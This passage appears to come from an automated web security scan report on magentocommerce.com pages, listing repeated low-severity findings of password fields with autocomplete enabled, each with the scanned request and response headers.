<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.70. http://www.magentocommerce.com/media/interviews/timeout-online/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/timeout-online/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/timeout-online/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175938; expires=Sat, 11-Aug-2012 15:05:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Ftimeout-online%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:39 GMT
Content-Length: 37701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.71. http://www.magentocommerce.com/media/interviews/tvonics/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/tvonics/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/tvonics/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175896; expires=Sat, 11-Aug-2012 15:04:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Ftvonics%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:56 GMT
Content-Length: 41632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.72. http://www.magentocommerce.com/media/interviews/wander/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wander/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/wander/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175967; expires=Sat, 11-Aug-2012 15:06:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fmedia%2Finterviews%2Fwander%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 40360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.73. http://www.magentocommerce.com/media/interviews/wearport/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wearport/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/wearport/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175899; expires=Sat, 11-Aug-2012 15:04:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fwearport%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:59 GMT
Content-Length: 38889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.74. http://www.magentocommerce.com/media/interviews/wkf-communications/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wkf-communications/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/wkf-communications/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175909; expires=Sat, 11-Aug-2012 15:05:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fwkf-communications%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:09 GMT
Content-Length: 39057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.75. http://www.magentocommerce.com/media/screencasts  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/interviews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170908; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.4.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171069; expires=Sat, 11-Aug-2012 13:44:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:29 GMT
Content-Length: 115374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.76. http://www.magentocommerce.com/media/screencasts/adding-related-products/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/adding-related-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.77. http://www.magentocommerce.com/media/screencasts/community-groups/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/community-groups/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176027; expires=Sat, 11-Aug-2012 15:07:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:07 GMT
Content-Length: 33275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.78. http://www.magentocommerce.com/media/screencasts/configurable-products/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/configurable-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176088; expires=Sat, 11-Aug-2012 15:08:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:08 GMT
Content-Length: 35258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.79. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/configuring-tier-pricing/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176151; expires=Sat, 11-Aug-2012 15:09:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Fscreencasts%2Fconfiguring-tier-pricing%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:11 GMT
Content-Length: 34931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.80. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/content-staging-and-merging/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176016; expires=Sat, 11-Aug-2012 15:06:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fmedia%2Fscreencasts%2Fcontent-staging-and-merging%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:56 GMT
Content-Length: 33289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.81. http://www.magentocommerce.com/media/screencasts/currency/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/currency/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176054; expires=Sat, 11-Aug-2012 15:07:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Fscreencasts%2Fcurrency%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:35 GMT
Content-Length: 34872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.82. http://www.magentocommerce.com/media/screencasts/data-exporting/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/data-exporting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
